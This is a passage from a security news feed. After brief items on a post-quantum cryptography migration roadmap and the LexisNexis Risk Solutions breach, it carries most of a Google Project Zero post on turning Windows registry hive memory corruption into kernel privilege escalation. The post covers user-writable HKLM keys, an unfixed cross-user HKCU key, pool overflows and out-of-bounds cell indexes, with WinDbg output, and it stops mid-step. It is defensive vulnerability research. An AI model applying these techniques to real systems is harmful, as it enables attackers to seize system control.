20-page PQCC migration roadmap details four migration phases to help CIOs and CISOs “act decisively, taking proactive steps to protect sensitive data now and in the future.” Those migration phases are: Preparation: Starting with an overview of an organization’s PQC migration aims, assigning a migration lead, identifying stakeholders, “and aligning stakeholders through strategic messaging.” Baseline Understanding: Gathering a baseline understanding of an organization’s data inventory, prioritizing assets to be updated, and establishing required resources and available budget. Planning and Execution: Collaborating with system vendors and internal system owners “to ensure that post-quantum solutions are acquired externally or developed internally and implemented effectively.” Monitoring and Evaluation: Developing measures for tracking migration process and formulating a process “for reassessing cryptographic security as quantum capabilities evolve.” “The process outlined in this roadmap underscores the importance of strategic planning, stakeholder alignment, and continuous monitoring and documentation to adapt to technological advancements and maintain robust security postures,” the migration document concludes. “As the quantum computing landscape continues to evolve, organizations must remain adaptable, tracking updates in guidance to maintain a secure PQC transition.”

https://thecyberexpress.com/post-quantum-cryptography-migration/
Attack on LexisNexis Risk Solutions exposes data on 300k +
2025-05-28T18:35:09Z | 1748457309

Data analytics and risk management biz says software dev platform breached, not itself LexisNexis Risk Solutions (LNRS) is the latest big-name organization to disclose a serious cyberattack leading to data theft, with the number of affected individuals pegged at 364,333.

https://go.theregister.com/feed/www.theregister.com/2025/05/28/attack_on_lexisnexis_risk_solutions/
The Windows Registry Adventure #8: Practical exploitation of hive memory corruption
2025-05-28T18:09:00Z | 1748455740

Posted by Mateusz Jurczyk, Google Project Zero In the previous blog post, we focused on the general security analysis of the registry and how to effectively approach finding vulnerabilities in it. Here, we will direct our attention to the exploitation of hive-based memory corruption bugs, i.e., those that allow an attacker to overwrite data within an active hive mapping in memory. This is a class of issues characteristic of the Windows registry, but universal enough that the techniques described here are applicable to 17 of my past vulnerabilities, as well as likely any similar bugs in the future. As we know, hives exhibit a very special behavior in terms of low-level memory management (how and where they are mapped in memory), handling of allocated and freed memory chunks by a custom allocator, and the nature of data stored there. All this makes exploiting this type of vulnerability especially interesting from the offensive security perspective, which is why I would like to describe it here in detail. Similar to any other type of memory corruption, the vast majority of hive memory corruption issues can be classified into two groups: spatial violations (such as buffer overflows): and temporal violations, such as use-after-free conditions: In this write up, we will aim to select the most promising vulnerability candidate and then create a step-by-step exploit for it that will elevate the privileges of a regular user in the system, from Medium IL to system-level privileges. Our target will be Windows 11, and an additional requirement will be to successfully bypass all modern security mitigations. I have previously presented on this topic at OffensiveCon 2024 with a presentation titled "Practical Exploitation of Registry Vulnerabilities in the Windows Kernel", and this blog post can be considered a supplement and expansion of the information shown there. Those deeply interested in the subject are encouraged to review the slides and recording available from that presentation.Where to start: high-level overview of potential options Let's start with a recap of some key points. As you may recall, the Windows registry cell allocator (i.e., the internal HvAllocateCell, HvReallocateCell, and HvFreeCell functions) operates in a way that is very favorable for exploitation. Firstly, it completely lacks any safeguards against memory corruption, and secondly, it has no element of randomness, making its behavior entirely predictable. Consequently, there is no need to employ any "hive spraying" or other similar techniques known from typical heap exploitation – if we manage to achieve the desired cell layout on a test machine, it will be reproducible on other computers without any additional steps. A potential exception could be carrying out attacks on global, shared hives within HKLM and HKU, as we don't know their initial state, and some randomness may arise from operations performed concurrently by other applications. Nevertheless, even this shouldn't pose a particularly significant challenge. We can safely assume that arranging the memory layout of a hive is straightforward, and if we have some memory corruption capability within it, we will eventually be able to overwrite any type of cell given some patience and experimentation. The exploitation of classic memory corruption bugs typically involves the following steps: Initial memory corruption primitive?????????Profit (in the form of arbitrary code execution, privilege escalation, etc.) The task of the exploit developer is to fill in the gaps in this list, devising the intermediate steps leading to the desired goal. There are usually several such intermediate steps because, given the current state of security and mitigations, vulnerabilities rarely lead directly from memory corruption to code execution in a single step. Instead, a strategy of progressively developing stronger and stronger primitives is employed, where the final chain might look like this, for instance: In this model, the second/third steps are achieved by finding another interesting object, arranging for it to be allocated near the overwritten buffer, and then corrupting it in such a way as to create a new primitive. However, in the case of hives, our options in this regard seem limited: we assume that we can fully control the representation of any cell in the hive, but the problem is that there is no immediately interesting data in them from an exploitation point of view. For example, the regf format does not contain any data that directly influences control flow (e.g., function pointers), nor any other addresses in virtual memory that could be overwritten in some clever way to improve the original primitive. The diagram below depicts our current situation: Does this mean that hive memory corruption is non-exploitable, and the only thing it allows for is data corruption in an isolated hive memory view? Not quite. In the following subsections, we will carefully consider various ideas of how taking control of the internal hive data can have a broader impact on the overall security of the system. Then, we will try to determine which of the available approaches is best suited for use in a real-world exploit.Intra-hive corruption Let's start by investigating whether overwriting internal hive data is as impractical as it might initially seem.Performing hive-only attacks in privileged system hives To be clear, it's not completely accurate to say that hives don't contain any data worth overwriting. If you think about it, it's quite the opposite – the registry stores a vast amount of system configuration, information about registered services, user passwords, and so on. The only issue is that all this critical data is located in specific hives, namely those mounted under HKEY_LOCAL_MACHINE, and some in HKEY_USERS (e.g., HKU\.Default, which corresponds to the private hive of the System user). To be able to perform a successful attack and elevate privileges by corrupting only regf format data (without accessing other kernel memory or achieving arbitrary code execution), two conditions must be met: The vulnerability must be triggerable solely through API/system calls and must not require binary control over the hive, as we obviously don't have that over any system hive.The target hive must contain at least one key with permissive enough access rights that allow unprivileged users to create values (KEY_SET_VALUE permission) and/or new subkeys (KEY_CREATE_SUB_KEY). Some other access rights might also be necessary, depending on the prerequisites of the specific bug. Of the two points above, the first is definitely more difficult to satisfy. Many hive memory corruption bugs result from a strange, unforeseen state in the hive structures that can only be generated "offline", starting with full control over the given file. API-only vulnerabilities seem to be relatively rare: for instance, of my 17 hive-based memory corruption cases, less than half (specifically 8 of them) could theoretically be triggered solely by operations on an existing hive. Furthermore, a closer look reveals that some of them do not meet other conditions needed to target system hives (e.g., they only affect differencing hives), or are highly impractical, e.g., require the allocation of more than 500 GB of memory, or take many hours to trigger. In reality, out of the wide range of vulnerabilities, there are really only two that would be well suited for directly attacking a system hive: CVE-2023-23420 (discussed in the "Operating on subkeys of transactionally renamed keys" section of the report) and CVE-2023-23423 (discussed in "Freeing a shallow copy of a key node with CmpFreeKeyByCell"). Regarding the second issue – the availability of writable keys – the situation is much better for the attacker. There are three reasons for this: To successfully carry out a data-only attack on a system key, we are usually not limited to one specific hive, but can choose any that suits us. Exploiting hive corruption in most, if not all, hives mounted under HKLM would enable an attacker to elevate privileges.The Windows kernel internally implements the key opening process by first doing a full path lookup in the registry tree, and only then checking the required user permissions. The access check is performed solely on the security descriptor of the specific key, without considering its ancestors. This means that setting overly permissive security settings for a key automatically makes it vulnerable to attacks, as according to this logic, it receives no additional protection from its ancestor keys, even if they have much stricter access controls.There are a large number of user-writable keys in the HKLM\SOFTWARE and HKLM\SYSTEM hives. They do not exist in HKLM\BCD00000000, HKLM\SAM, or HKLM\SECURITY, but as I mentioned above, only one such key is sufficient for successful exploitation. To find specific examples of such publicly accessible keys, it is necessary to write custom tooling. This tooling should first recursively list all existing keys within the low-level \Registry\Machine and \Registry\User paths, while operating with the highest possible privileges, ideally as the System user. This will ensure that the process can see all the keys in the registry tree – even those hidden behind restricted parents. It is not worth trying to enumerate the subkeys of \Registry\A, as any references to it are unconditionally blocked by the Windows kernel. Similarly, \Registry\WC can likely be skipped unless one is interested in attacking differencing hives used by containerized applications. Once we have a complete list of all the keys, the next step is to verify which of them are writable by unprivileged users. This can be accomplished either by reading their security descriptors (using RegGetKeySecurity) and manually checking their access rights (using AccessCheck), or by delegating this task entirely to the kernel and simply trying to open every key with the desired rights while operating with regular user privileges. In either case, we should be ultimately able to obtain a list of potential keys that can be used to corrupt a system hive. Based on my testing, there are approximately 1678 keys within HKLM that grant subkey creation rights to normal users on a current Windows 11 system. Out of these, 1660 are located in HKLM\SOFTWARE, and 18 are in HKLM\SYSTEM. Some examples include: HKLM\SOFTWARE\Microsoft\CoreShell HKLM\SOFTWARE\Microsoft\DRM HKLM\SOFTWARE\Microsoft\Input\Locales          (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Input\Settings         (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Shell\Oobe HKLM\SOFTWARE\Microsoft\Shell\Session HKLM\SOFTWARE\Microsoft\Tracing                (and some of its subkeys) HKLM\SOFTWARE\Microsoft\Windows\UpdateApi HKLM\SOFTWARE\Microsoft\WindowsUpdate\UX HKLM\SOFTWARE\WOW6432Node\Microsoft\DRM HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing HKLM\SYSTEM\Software\Microsoft\TIP             (and some of its subkeys) HKLM\SYSTEM\ControlSet001\Control\Cryptography\WebSignIn\Navigation HKLM\SYSTEM\ControlSet001\Control\MUI\StringCacheSettings HKLM\SYSTEM\ControlSet001\Control\USB\AutomaticSurpriseRemoval HKLM\SYSTEM\ControlSet001\Services\BTAGService\Parameters\Settings As we can see, there are quite a few possibilities. The second key on the list, HKLM\SOFTWARE\Microsoft\DRM, has been somewhat popular in the past, as it was previously used by James Forshaw to demonstrate two vulnerabilities he discovered in 2019–2020 (CVE-2019-0881, CVE-2020-1377). Subsequently, I also used it as a way to trigger certain behaviors related to registry virtualization (CVE-2023-21675, CVE-2023-21748, CVE-2023-35357), and as a potential avenue to fill the SOFTWARE hive to its capacity, thereby causing an OOM condition as part of exploiting another bug (CVE-2023-32019). The main advantage of this key is that it exists in all modern versions of the system (since at least Windows 7), and it grants broad rights to all users (the Everyone group, also known as World, or S-1-1-0). The other keys mentioned above also allow regular users write operations, but they often do so through other, potentially more restricted groups such as Interactive (S-1-5-4), Users (S-1-5-32-545), or Authenticated Users (S-1-5-11), which may be something to keep in mind. Apart from global system hives, I also discovered the curious case of the HKCU\Software\Microsoft\Input\TypingInsights key being present in every user's hive, which permits read and write access to all other users in the system. I reported it to Microsoft in December 2023 (link to report), but it was deemed low severity and hasn't been fixed so far. This decision is somewhat understandable, as the behavior doesn't have direct, serious consequences for system security, but it still can work as a useful exploitation technique. Since any user can open a key for writing in the user hive of any other user, they gain the ability to: Fill the entire 2 GiB space of that hive, resulting in a DoS condition (the user and their applications cannot write to HKCU) and potentially enabling exploitation of bugs related to mishandling OOM conditions within the hive.Write not just to the "TypingInsights" key in the HKCU itself, but also to any of the corresponding keys in the differencing hives overlaid on top of it. This provides an opportunity to attack applications running within app/server silos with that user's permissions.Perform hive-based memory corruption attacks not only on system hives, but also on the hives of specific users, allowing for a more lateral privilege escalation scenario. As demonstrated, even a seemingly minor weakness in the security descriptor of a single registry key can have significant consequences for system security. In summary, attacking system hives with hive memory corruption is certainly possible, but requires finding a very good vulnerability that can be triggered on existing keys, without the need to load a custom hive. This is a good starting point, but perhaps we can find a more universal technique.Abusing regf inconsistency to trigger kernel pool corruption While hive mappings in memory are isolated and self-contained to some extent, they do not exist in a vacuum. The Windows kernel allocates and manages many additional registry-related objects within the kernel pool space, as discussed in blog post #6. These objects serve as optimization through data caching, and help implement certain functionalities that cannot be achieved solely through operations on the hive space (e.g., transactions, layered keys). Some of these objects are long-lived and persist in memory as long as the hive is mounted. Other buffers are allocated and immediately freed within the same syscall, serving only as temporary data storage. The memory safety of all these objects is closely tied to the consistency of the corresponding data within the hive mapping. After the kernel meticulously verifies the hive validity in CmCheckRegistry and related functions, it assumes that the registry hive's data maintains consistency with its own structure and associated auxiliary structures. For a potential attacker, this means that hive memory corruption can be potentially escalated to some forms of pool corruption. This provides a much broader spectrum of options for exploitation, as there are a variety of pool allocations used by various parts of the kernel. In fact, I even took advantage of this behavior in my reports to Microsoft: in every case of a use-after-free on a security descriptor, I would enable Special Pool and trigger a reference to the cached copy of that descriptor on the pools through the _CM_KEY_CONTROL_BLOCK.CachedSecurity field. I did this because it is much easier to generate a reliably reproducible crash by accessing a freed allocation on the pool than when accessing a freed but still mapped cell in the hive.  However, this is certainly not the only way to cause pool memory corruption by modifying the internal data of the regf format. Another idea would be, for example, to create a very long "big data" value in the hive (over ~16 KiB in a hive with version ≥ 1.4) and then cause _CM_KEY_VALUE.DataLength to be inconsistent with the _CM_BIG_DATA.Count field, which denotes the number of 16-kilobyte chunks in the backing buffer. If we look at the implementation of the internal CmpGetValueData function, it is easy to see that it allocates a paged pool buffer based on the former value, and then copies data to it based on the latter one. Therefore, if we set _CM_KEY_VALUE.DataLength to a number less than 16344 × (_CM_BIG_DATA.Count - 1), then the next time the value's data is requested, a linear pool buffer overflow will occur. This type of primitive is promising, as it opens the door to targeting a much wider range of objects in memory than was previously possible. The next step would likely involve finding a suitable object to place immediately after the overwritten buffer (e.g., pipe attributes, as mentioned in this article from 2020), and then corrupting it to achieve a more powerful primitive like arbitrary kernel read/write. In short, such an attack would boil down to a fairly generic exploitation of pool-based memory corruption, a topic widely discussed in existing resources. We won't explore this further here, and instead encourage interested readers to investigate it on their own.Inter-hive memory corruption So far in our analysis, we have assumed that with a hive-based memory corruption bug, we can only modify data within the specific hive we are operating on. In practice, however, this is not necessarily the case, because there might be other data located in the immediate vicinity of our bin's mapping in memory. If that happens, it might be possible to seamlessly cross the boundary between the original hive and some more interesting objects at higher memory addresses using a linear buffer overflow. In the following sections, we will look at two such scenarios: one where the mapping of the attacked hive is in the user-mode space of the "Registry" process, and one where it resides in the kernel address space.Other hive mappings in the user space of the Registry process Mapping the section views of hives in the user space of the Registry process is the default behavior for the vast majority of the registry. The layout of individual mappings in memory can be easily observed from WinDbg. To do this, find the Registry process (usually the second in the system process list), switch to its context, and then issue the !vad command. An example of performing these operations is shown below. 0: kd> !process 0 0 **** NT ACTIVE PROCESS DUMP **** PROCESS ffffa58fa069f040     SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000     DirBase: 001ae002  ObjectTable: ffffe102d72678c0  HandleCount: 3077.     Image: System PROCESS ffffa58fa074a080     SessionId: none  Cid: 007c    Peb: 00000000  ParentCid: 0004     DirBase: 1025ae002  ObjectTable: ffffe102d72d1d00  HandleCount:     Image: Registry [...] 0: kd> .process ffffa58fa074a080 Implicit process is now ffffa58f`a074a080 WARNING: .cache forcedecodeuser is not enabled 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa207f740  5        152e7a20        152e7a2f               0 Mapped       READONLY           \Windows\System32\config\SAM ffffa58fa207dbc0  4        152e7a30        152e7b2f               0 Mapped       READONLY           \Windows\System32\config\DEFAULT ffffa58fa207dc60  5        152e7b30        152e7b3f               0 Mapped       READONLY           \Windows\System32\config\SECURITY ffffa58fa207d940  3        152e7b40        152e7d3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207dda0  5        152e7d40        152e7f3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] ffffa58fa207e840  5        152ec940        152ecb3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa207b780  3        152ecb40        152ecd3f               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa0f98ba0  5        152ecd40        152ecd4f               0 Mapped       READONLY           \EFI\Microsoft\Boot\BCD ffffa58fa3af5440  4        152ecd50        152ecd8f               0 Mapped       READONLY           \Windows\ServiceProfiles\NetworkService\NTUSER.DAT ffffa58fa3bfe9c0  5        152ecd90        152ecdcf               0 Mapped       READONLY           \Windows\ServiceProfiles\LocalService\NTUSER.DAT ffffa58fa3ca3d20  1        152ecdd0        152ece4f               0 Mapped       READONLY           \Windows\System32\config\BBI ffffa58fa2102790  6        152ece50        152ecf4f               0 Mapped       READONLY           \Users\user\NTUSER.DAT ffffa58fa4145640  5        152ecf50        152ed14f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa4145460  6        152ed150        152ed34f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412a520  4        152ed350        152ed44f               0 Mapped       READONLY           \Windows\System32\config\DRIVERS ffffa58fa412c5a0  6        152ed450        152ed64f               0 Mapped       READONLY           \Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat ffffa58fa4e8bf60  5        152ed650        152ed84f               0 Mapped       READONLY           \Windows\appcompat\Programs\Amcache.hve In the listing above, the "Start" and "End" columns show the starting and ending addresses of each mapping divided by the page size, which is 4 KiB. In practice, this means that the SAM hive is mapped at 0x152e7a20000 – 0x152e7a2ffff, the DEFAULT hive is mapped at 0x152e7a30000 – 0x152e7b2ffff, and so on. We can immediately see that all the hives are located very close to each other, with practically no gaps in between them. However, this example does not directly demonstrate whether it's possible to place, for instance, the mapping of the SOFTWARE hive directly after the mapping of an app hive loaded by a normal user. The addresses of the system hives appear to be already determined, and there isn't much space between them to inject our own data. Fortunately, hives can grow dynamically, especially when you start writing long values to them. This leads to the creation of new bins and mapping them at new addresses in the Registry process's memory. For testing purposes, I wrote a simple program that creates consecutive values of 0x3FD8 bytes within a given key. This triggers the allocation of new bins of exactly 0x4000 bytes: 0x3FD8 bytes of data plus 0x20 bytes for the _HBIN structure, 4 bytes for the cell size, and 4 bytes for padding. Next, I ran two instances of it in parallel on an app hive and HKLM\SOFTWARE, filling the former with the letter "A" and the latter with the letter "B". The result of the test was immediately visible in the memory layout: 0: kd> !vad VAD             Level         Start             End              Commit ffffa58fa67b44c0  8        15280000        152801ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5b40  7        15280200        152803ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b46a0  8        15280400        152805ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b6540  6        15280600        152807ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5dc0  8        15280800        152809ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b4560  7        15280a00        15280bff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b6900  8        15280c00        15280dff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b5280  5        15280e00        15280fff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b5e60  8        15281000        152811ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b7800  7        15281200        152813ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8de0  8        15281400        152815ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE ffffa58fa67b8840  6        15281600        152817ff               0 Mapped       READONLY           \Users\user\Desktop\test.dat ffffa58fa67b8980  8        15281800        152819ff               0 Mapped       READONLY           \Windows\System32\config\SOFTWARE [...] What we have here are interleaved mappings of trusted and untrusted hives, each 2 MiB in length and tightly packed with 512 bins of 16 KiB each. Importantly, there are no gaps between the end of one mapping and the start of another, which means that it is indeed possible to use memory corruption within one hive to influence the internal representation of another. Take, for example, the boundary between the test.dat and SOFTWARE hives at address 0x15280400000. If we dump the memory area encompassing a few dozen bytes before and after this page boundary, we get the following result: 0: kd> db 0x15280400000-30 00000152`803fffd0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803fffe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA 00000152`803ffff0  41 41 41 41 41 41 41 41-41 41 41 41 00 00 00 00  AAAAAAAAAAAA.... 00000152`80400000  68 62 69 6e 00 f0 bf 0c-00 40 00 00 00 00 00 00  hbin.....@...... 00000152`80400010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ 00000152`80400020  20 c0 ff ff 42 42 42 42-42 42 42 42 42 42 42 42   ...BBBBBBBBBBBB 00000152`80400030  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB 00000152`80400040  42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42  BBBBBBBBBBBBBBBB We can clearly see that the bytes belonging to both hives in question exist within a single, continuous memory area. This, in turn, means that memory corruption could indeed spread from one hive into the other. However, to successfully achieve this result, one would also need to ensure that the specific fragment of the target hive is marked as dirty. Otherwise, this memory page would be marked as PAGE_READONLY, which would lead to a system crash when attempting to write data, despite both regions being directly adjacent to each other. After successfully corrupting data in a global, system hive, the remainder of the attack would likely involve either modifying a security descriptor to grant oneself write permissions to specific keys, or directly changing configuration data to enable the execution of one's own code with administrator privileges.Attacking adjacent memory in pool-based hive mappings Although hive file views are typically mapped in the user-mode space of the Registry process (which contains nothing else but these mappings), there are a few circumstances where this data is stored directly in kernel-mode pools. These cases are as follows: All volatile hives, which have no persistent representation as regf files on disk. Examples include the virtual hive rooted at \Registry, as well as the HKLM\HARDWARE hive.The entire HKLM\SYSTEM hive, including both its stable and volatile parts.All hives that have been recently created by calling one of the NtLoadKey* syscalls on a previously non-existent file, including newly created app hives.Volatile storage space of every active hive in the system. The first point is not useful to a potential attacker because these types of hives do not grant unprivileged users write permissions. The second and third points are also quite limited, as they could only be exploited through memory corruption that doesn't require binary control over the input hive. However, the fourth point makes it possible to exploit vulnerabilities in any hive in the system, including app hives. This is because creating volatile keys does not require any special permissions compared to regular keys. Additionally, if we have a memory corruption primitive within one storage type, we can easily influence data within the other. For example, in the case of stable storage memory corruption, it is enough to craft a value for which the cell index _CM_KEY_VALUE.Data has the highest bit set, and thus points to the volatile space. From this point, we can arbitrarily modify regf structures located in that space, and directly read/write out-of-bounds pool memory by setting a sufficiently long value size (exceeding the bounds of the given bin). Such a situation is shown in the diagram below: This behavior can be further verified on a specific example. Let's consider the HKCU hive for a user logged into a Windows 11 system – it will typically have some data stored in the volatile storage due to the existence of the "HKCU\Volatile Environment" key. Let's first find the hive in WinDbg using the !reg hivelist command: 0: kd> !reg hivelist --------------------------------------------------------------------------------------------------------------------------------------------- |     HiveAddr     |Stable Length|    Stable Map    |Volatile Length|    Volatile Map    |     BaseBlock     | FileName  --------------------------------------------------------------------------------------------------------------------------------------------- [...] | ffff82828fc1a000 |      ee000  | ffff82828fc1a128 |       5000    |  ffff82828fc1a3a0  | ffff82828f8cf000  | \??\C:\Users\user\ntuser.dat [...] As can be seen, the hive has a volatile space of 0x5000 bytes (5 memory pages). Let's try to find the second page of this hive region in memory by translating its corresponding cell index: 0: kd> !reg cellindex ffff82828fc1a000 80001000 Map = ffff82828fc1a3a0 Type = 1 Table = 0 Block = 1 Offset = 0 MapTable     = ffff82828fe6a000  MapEntry     = ffff82828fe6a018  BinAddress = ffff82828f096009, BlockOffset = 0000000000000000 BlockAddress = ffff82828f096000  pcell:  ffff82828f096004 It is a kernel-mode address, as expected. We can dump its contents to verify that it indeed contains registry data: 0: kd> db ffff82828f096000 ffff8282`8f096000  68 62 69 6e 00 10 00 00-00 10 00 00 00 00 00 00  hbin............ ffff8282`8f096010  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................ ffff8282`8f096020  38 ff ff ff 73 6b 00 00-20 10 00 80 20 10 00 80  8...sk.. ... ... ffff8282`8f096030  01 00 00 00 b0 00 00 00-01 00 04 88 98 00 00 00  ................ ffff8282`8f096040  a4 00 00 00 00 00 00 00-14 00 00 00 02 00 84 00  ................ ffff8282`8f096050  05 00 00 00 00 03 24 00-3f 00 0f 00 01 05 00 00  ......$.?....... ffff8282`8f096060  00 00 00 05 15 00 00 00-dc be 84 0b 6c 21 35 39  ............l!59 ffff8282`8f096070  b9 d0 84 88 ea 03 00 00-00 03 14 00 3f 00 0f 00  ............?... Everything looks good. At the start of the page, there is a bin header, and at offset 0x20, we see the first cell corresponding to a security descriptor ('sk'). Now, let's see what the !pool command tells us about this address: 0: kd> !pool ffff82828f096000 Pool page ffff82828f096000 region is Paged pool *ffff82828f096000 : large page allocation, tag is CM16, size is 0x1000 bytes                 Pooltag CM16 : Internal Configuration manager allocations, Binary : nt!cm We are dealing with a paged pool allocation of 0x1000 bytes requested by the Configuration Manager. And what is located right behind it? 0: kd> !pool ffff82828f096000+1000 Pool page ffff82828f097000 region is Paged pool *ffff82828f097000 : large page allocation, tag is Obtb, size is 0x1000 bytes                 Pooltag Obtb : object tables via EX handle.c, Binary : nt!ob 0: kd> !pool ffff82828f096000+2000 Pool page ffff82828f098000 region is Paged pool *ffff82828f098000 : large page allocation, tag is Gpbm, size is 0x1000 bytes                 Pooltag Gpbm : GDITAG_POOL_BITMAP_BITS, Binary : win32k.sys The next two memory pages correspond to other, completely unrelated allocations on the pool: one associated with the NT Object Manager, and the other with the win32k.sys graphics driver. This clearly demonstrates that in the kernel space, areas containing volatile hive data are mixed with various other allocations used by other parts of the system. Moreover, this technique is attractive because it not only enables out-of-bound writes of controlled data, but also the ability to read this OOB data beforehand. Thanks to this, the exploit does not have to operate "blindly", but it can precisely verify whether the memory is arranged exactly as expected before proceeding with the next stage of the attack. With these kinds of capabilities, writing the rest of the exploit should be a matter of properly grooming the pool layout and finding some good candidate objects for corruption.The ultimate primitive: out-of-bounds cell indexes The situation is clearly not as hopeless as it might have seemed earlier, and there are quite a few ways to convert memory corruption in one's own hive space into taking control of other types of memory. All of them, however, have one minor flaw: they rely on prearranging a specific layout of objects in memory (e.g., hive mappings in the Registry process, or allocations on the paged pool), which means they cannot be said to be 100% stable or deterministic. The randomness of the memory layout carries the inherent risk that either the exploit simply won't work, or worse, it will crash the operating system in the process. For lack of better alternatives, these techniques would be sufficient, especially for demonstration purposes. However, I found a better method that guarantees 100% effectiveness by completely eliminating the element of randomness. I have hinted at or even directly mentioned this many times in previous blog posts in this series, and I am, of course, referring to out-of-bounds cell indexes. As a quick reminder, cell indexes are the hive's equivalent of pointers: they are 32-bit values that allow allocated cells to reference each other. The translation of cell indexes into their corresponding virtual addresses is achieved using a special 3-level structure called a cell map, which resembles a CPU page table: The C-like pseudocode of the internal HvpGetCellPaged function responsible for performing the cell map walk is presented below: _CELL_DATA *HvpGetCellPaged(_HHIVE *Hive, HCELL_INDEX Index) {   _HMAP_ENTRY *Entry = &Hive->Storage[Index >> 31].Map                             ->Directory[(Index >> 21) & 0x3FF]                             ->Table[(Index >> 12) & 0x1FF];   return (Entry->PermanentBinAddress & (~0xF)) + Entry->BlockOffset + (Index & 0xFFF) + 4; } The structures corresponding to the individual levels of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, and they are accessible through the _CMHIVE.Hive.Storage field. From an exploitation perspective, two facts are crucial here. First, the HvpGetCellPaged function does not perform any bounds checks on the input index. Second, for hives smaller than 2 MiB, Windows applies an additional optimization called "small dir". In that case, instead of allocating the entire Directory array of 1024 elements and only using one of them, the kernel sets the _CMHIVE.Hive.Storage[...].Map pointer to the address of the _CMHIVE.Hive.Storage[...].SmallDir field, which simulates a single-element array. In this way, the number of logical cell map levels remains the same, but the system uses one less pool allocation to store them, saving about 8 KiB of memory per hive. This behavior is shown in the screenshot below: What we have here is a hive that has a stable storage area of 0xEE000 bytes (952 KiB) and a volatile storage area of 0x5000 bytes (20 KiB). Both of these sizes are smaller than 2 MiB, and consequently, the "small dir" optimization is applied in both cases. As a result, the Map pointers (marked in orange) point directly to the SmallDir fields (marked in green). This situation is interesting because if the kernel attempts to resolve an invalid cell index with a value of 0x200000 or greater (i.e., with the "Directory index" part being non-zero) in the context of such a hive, then the first step of the cell map walk will reference the out-of-bounds Guard, FreeDisplay, etc. fields as pointers. This situation is illustrated in the diagram below: In other words, by fully controlling the 32-bit value of the cell index, we can make the translation logic jump through two pointers fetched from out-of-bounds memory, and then add a controlled 12-bit offset to the result. An additional consideration is that in the first step, we reference OOB indexes of an "array" located inside the larger _CMHIVE structure, which always has the same layout on a given Windows build. Therefore, by choosing a directory index that references a specific pointer in _CMHIVE, we can be sure that it will always work the same way on a given version of the system, regardless of any random factors. On the other hand, a small inconvenience is that the _HMAP_ENTRY structure (i.e., the last level of the cell map) has the following layout: 0: kd> dt _HMAP_ENTRY nt!_HMAP_ENTRY    +0x000 BlockOffset      : Uint8B    +0x008 PermanentBinAddress : Uint8B    +0x010 MemAlloc         : Uint4B And the final returned value is the sum of the BlockOffset and PermanentBinAddress fields. Therefore, if one of these fields contains the address we want to reference, the other must be NULL, which may slightly narrow down our options. If we were to create a graphical representation of the relationships between structures based on the pointers they contain, starting from _CMHIVE, it would look something like the following: The diagram is not necessarily complete, but it shows an overview of some objects that can be reached from _CMHIVE with a maximum of two pointer dereferences. However, it is important to remember that not every edge in this graph will be traversable in practice. This is because of two reasons: first, due the layout of the _HMAP_ENTRY structure (i.e. 0x18-byte alignment and the need for a 0x0 value being adjacent to the given pointer), and second, due to the fact that not every pointer in these objects is always initialized. For example, the _CMHIVE.RootKcb field is only valid for app hives (but not for normal hives), while _CMHIVE.CmRm is only set for standard hives, as app hives never have KTM transaction support enabled. So, the idea provides some good foundation for our exploit, but it does require additional experimentation to get every technical detail right. Moving on, the !reg cellindex command in WinDbg is perfect for testing out-of-bounds cell indexes, because it uses the exact same cell map walk logic as HvpGetCellPaged, and it doesn't perform any additional bounds checks either. So, let's stick with the HKCU hive we were working with earlier, and try to create a cell index that points back to its _CMHIVE structure. We'll use the _CMHIVE → _CM_RM → _CMHIVE path for this. The first decision we need to make is to choose the storage type for this index: stable (0) or volatile (1). In the case of HKCU, both storage types are non-empty and use the "small dir" optimization, so we can choose either one; let's say volatile. Next, we need to calculate the directory index, which will be equal to the difference between the offsets of the _CMHIVE.CmRm and _CMHIVE.Hive.Storage[1].SmallDir fields: 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) (&((nt!_CMHIVE*)0xffff82828fc1a000)->Hive.Storage[1].SmallDir) : 0xffff82828fc1a3a0 [Type: _HMAP_TABLE * *]     0xffff82828fe6a000 [Type: _HMAP_TABLE *] 0: kd> dx (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm) (&((nt!_CMHIVE*)0xffff82828fc1a000)->CmRm)                     : 0xffff82828fc1b038 [Type: _CM_RM * *]     0xffff82828fdcc8e0 [Type: _CM_RM *] In this case, it is (0xffff82828fc1b038 - 0xffff82828fc1a3a0) ÷ 8 = 0x193. The next step is to calculate the table index, which will be the offset of the _CM_RM.CmHive field from the beginning of the structure, divided by the size of _HMAP_ENTRY (0x18). 0: kd> dx 